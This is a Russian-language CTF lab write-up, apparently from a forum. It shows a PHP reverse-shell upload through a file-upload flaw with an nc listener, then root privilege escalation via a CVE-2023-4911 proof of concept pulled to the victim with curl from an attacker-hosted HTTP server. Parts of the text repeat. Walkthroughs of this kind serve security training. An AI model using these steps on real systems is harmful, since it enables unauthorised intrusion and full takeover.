CTF reference:
Сontents:
Web-1-1
-Step 1: Preparing
-Step 2: Gathering information
-Step 3: Attack
Web-1-2
используем команду и добавляем следующие записи
Переходим на страницу
и видим сылку на либу(нижний правый угол ), переходим на нее
Попадаем на следующий страничку с интерфейсом загрузки файлов.
Так зная что это за уязвимость(в названии задания php upload ) я сразу загуглил (это файл стандартный файл что можно использовать в таких рода заданиях)
answer: GitHub - pentestmonkey/php-reverse-shell
Почему php? потому что расширение в браузере показывает какие есть языки на веб сервере
Далее следует скопировать файл, используя удобный способ, по следующему адресу:
php-reverse-shell.php.После загрузки файла откройте его для ознакомления .
Обратите внимание, что необходимо изменить значения IP-адреса и порта на свои собственные. Чтобы узнать свой IP-адрес, выполните команду ip a .
(И смотрим значение tun0 Так как нам нужно значение нашего айпи в ВПН(tun0 как раз и будет нашим впн), это важно)
В значении порт указывает тот порт что мы будем слушать через команду
(Перед атакой, вам нужно настроить burp proxy На вашей машинке . Погуглите. )
Перехватываем запрос на загрузку файлов. и меняем сдедующие параметры
Подробнее об уязвимостях этого функционала можно прочитать здесь:
Теперь нам нужно было запустить(выполнить) наш скрипт. Я нашел на сайте обычную картинку, посмотрел ее URL и понял, где искать свой файл.
В адресной строке я увидел что-то вроде:
Изучив данный Url я получил представление где искать наши(-у) картинки
Преждем чем его вызвать не забудьте включить
nc -lnvp 4545
(4545 это порт что был в нашем скрипте)
Если вы все сделали правильно то вы увидите
Далее по заданию запускаем скрипт и получаем флаг
Повышение привилегий на линукс довольная большая тема, и проверяемая различные векторы атак я наткнулся на нужный нам
Проверяем версию
Вывод будет примерно таким:
Загуглив
Нашел следующий эксплоит CVE-2023-4911
Проверьте, находится ли версия glibc в диапазоне от 2.34 до 2.39. Если да, то ваш сервер уязвим.
(не скину ссылку на уязвимость так как той которой я пользовался.... была удаленна с gihub ... печально )
После того как вы нашли нужный poc его стоит скачать на вашу машину , а после и на машину жертвы
Запускаем питон сервер на нашей машине, в той же папке и где наш эксплоит
На машине жертвы :
переходим в каталог /var/www/html/wordpress
Используем Curl -O Для скачивания и флаг -O для сохранения этих файлов
Выдаем права за запуск всем файлам
По инструкции с github запускам
и компилим наш эксплоит
Даллее запускаем
если все прошло успешно проверям наши права через команду Id
И запускаем последний скрипт для получения второго файла
Ссылка скрыта от гостей
Сontents:
Web-1-1
-Step 1: Preparing
-Step 2: Gathering information
-Step 3: Attack
Web-1-2
Web-1-1
Step 1: Preparing
используем команду и добавляем следующие записи
sudo nano /etc/hosts
Код:
10.124.1.231 aircraft.edu.stf
10.124.1.232 calculator.edu.stf
10.124.1.233 library.edu.stf
10.124.1.234 wp.edu.stf
10.124.1.235 www.edu.stf
10.124.1.236 gallery.edu.stf
10.124.1.237 utils.edu.stf
10.124.1.238 shop.edu.stf
10.124.1.239 tokenizer.edu.stf
10.124.1.240 bind.edu.stf
10.124.1.241 smashmusic.edu.stf
10.124.1.242 test-webserver.edu.stf
10.124.1.253 vpn.edu.stf
Step 2: Gathering information
Переходим на страницу
Ссылка скрыта от гостей
и видим сылку на либу(нижний правый угол ), переходим на нее
Попадаем на следующий страничку с интерфейсом загрузки файлов.
Так зная что это за уязвимость(в названии задания php upload ) я сразу загуглил (это файл стандартный файл что можно использовать в таких рода заданиях)
reverse shell php
in googleanswer: GitHub - pentestmonkey/php-reverse-shell
Почему php? потому что расширение в браузере показывает какие есть языки на веб сервере
Далее следует скопировать файл, используя удобный способ, по следующему адресу:
php-reverse-shell.php.После загрузки файла откройте его для ознакомления .
Обратите внимание, что необходимо изменить значения IP-адреса и порта на свои собственные. Чтобы узнать свой IP-адрес, выполните команду ip a .
(И смотрим значение tun0 Так как нам нужно значение нашего айпи в ВПН(tun0 как раз и будет нашим впн), это важно)
В значении порт указывает тот порт что мы будем слушать через команду
rlwrap nc -lnvp YOUR PORT
или nc -lnvp YOUR PORT
Step 3: Attack
Теперь нужно провести нашу атаку.(Перед атакой, вам нужно настроить burp proxy На вашей машинке . Погуглите. )
Перехватываем запрос на загрузку файлов. и меняем сдедующие параметры
Подробнее об уязвимостях этого функционала можно прочитать здесь:
-
Ссылка скрыта от гостей(здесь можно выполнять задания по этой теме)
-
Ссылка скрыта от гостей
Теперь нам нужно было запустить(выполнить) наш скрипт. Я нашел на сайте обычную картинку, посмотрел ее URL и понял, где искать свой файл.
В адресной строке я увидел что-то вроде:
http://library.edu.stf/wp-content/ch1.png
Изучив данный Url я получил представление где искать наши(-у) картинки
Ссылка скрыта от гостей
Преждем чем его вызвать не забудьте включить
nc -lnvp 4545
(4545 это порт что был в нашем скрипте)
Если вы все сделали правильно то вы увидите
Далее по заданию запускаем скрипт и получаем флаг
./home/rceflag
web-1-2 Lpe
Некоторые cve poc просто напросто не работали, стоит поискать другие...
если не ошибаюсь ... попробуйте вот этот GitHub - hadrian3689/looney-tunables-CVE-2023-4911
если не ошибаюсь ... попробуйте вот этот GitHub - hadrian3689/looney-tunables-CVE-2023-4911
Повышение привилегий на линукс довольная большая тема, и проверяемая различные векторы атак я наткнулся на нужный нам
Проверяем версию
ldd --version
Вывод будет примерно таким:
Код:
ldd (Ubuntu GLIBC 2.35-0ubuntu3.4) 2.35
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
Загуглив
ldd 2.35 cve poc
Нашел следующий эксплоит CVE-2023-4911
Проверьте, находится ли версия glibc в диапазоне от 2.34 до 2.39. Если да, то ваш сервер уязвим.
(не скину ссылку на уязвимость так как той которой я пользовался.... была удаленна с gihub ... печально )
После того как вы нашли нужный poc его стоит скачать на вашу машину , а после и на машину жертвы
Запускаем питон сервер на нашей машине, в той же папке и где наш эксплоит
python3 -m http.server 4646
На машине жертвы :
переходим в каталог /var/www/html/wordpress
Используем Curl -O Для скачивания и флаг -O для сохранения этих файлов
curl -O http://<your_ip>:4646/exp.c
curl -O http://<your_ip>:4646/libc.py
Выдаем права за запуск всем файлам
chmod +x *
По инструкции с github запускам
python3 libc.py
и компилим наш эксплоит
gcc exp.c -o exp
Даллее запускаем
./exp
если все прошло успешно проверям наши права через команду Id
id uid=0(root) gid=33(www-data) groups=33(www-data)
И запускаем последний скрипт для получения второго файла
./home/lpeflag
Последнее редактирование: